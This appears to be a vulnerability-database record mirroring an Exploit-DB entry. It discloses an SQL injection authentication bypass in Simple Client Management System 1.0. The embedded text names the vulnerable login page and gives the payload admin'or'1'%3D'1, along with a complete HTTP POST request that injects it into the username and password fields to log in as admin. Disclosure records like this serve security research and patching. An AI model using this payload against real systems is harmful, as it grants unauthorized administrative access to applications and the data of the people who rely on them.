{"id": "EDB-ID:50497", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Simple Client Management System 1.0 - SQLi (Authentication Bypass)", "description": "", "published": "2021-11-08T00:00:00", "modified": "2021-11-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/50497", "reporter": "Sentinal920", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-05-13T17:34:34", "viewCount": 186, "enchantments": {"dependencies": {}, "score": {"value": 6.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25005", "CVE-2020-25006"]}]}, "exploitation": null, "vulnersScore": 6.3}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/50497", "sourceData": "# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass)\r\n# Exploit Author: Sentinal920\r\n# Date: 5-11-2021\r\n# Category: Web application\r\n# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip\r\n# Version: 1.0\r\n# Tested on: Kali Linux\r\n# Vulnerable page: Login\r\n# Vulnerable Parameter: \"password\"\r\n\r\n\r\nTechnical description:\r\nAn SQL Injection vulnerability exists in the Simple Client Management\r\nSystem. 
An attacker can leverage the vulnerable \"password\" parameter\r\nin the \"Login.php\" web page to authenticate as an admin user.\r\n\r\nSteps to exploit:\r\n1) Navigate to http://localhost/cms/admin/login.php\r\n2) Set username as admin and insert your payload in the password parameter\r\n\r\nProof of concept (Poc):\r\nThe following payload inside password will allow you to login into the\r\nweb server as admin\r\nadmin'or'1'%3D'1\r\n\r\n---\r\n\r\nPOST /cms/classes/Login.php?f=login HTTP/1.1\r\nHost: localhost\r\nContent-Length: 51\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nsec-ch-ua-mobile: ?0\r\nOrigin: http://localhost\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: http://localhost/cms/admin/login.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn\r\nConnection: close\r\n\r\nusername=admin'or'1'%3D'1&password=admin'or'1'%3D'1\r\n\r\n---", "osvdbidlist": [], "exploitType": "webapps", "verified": false}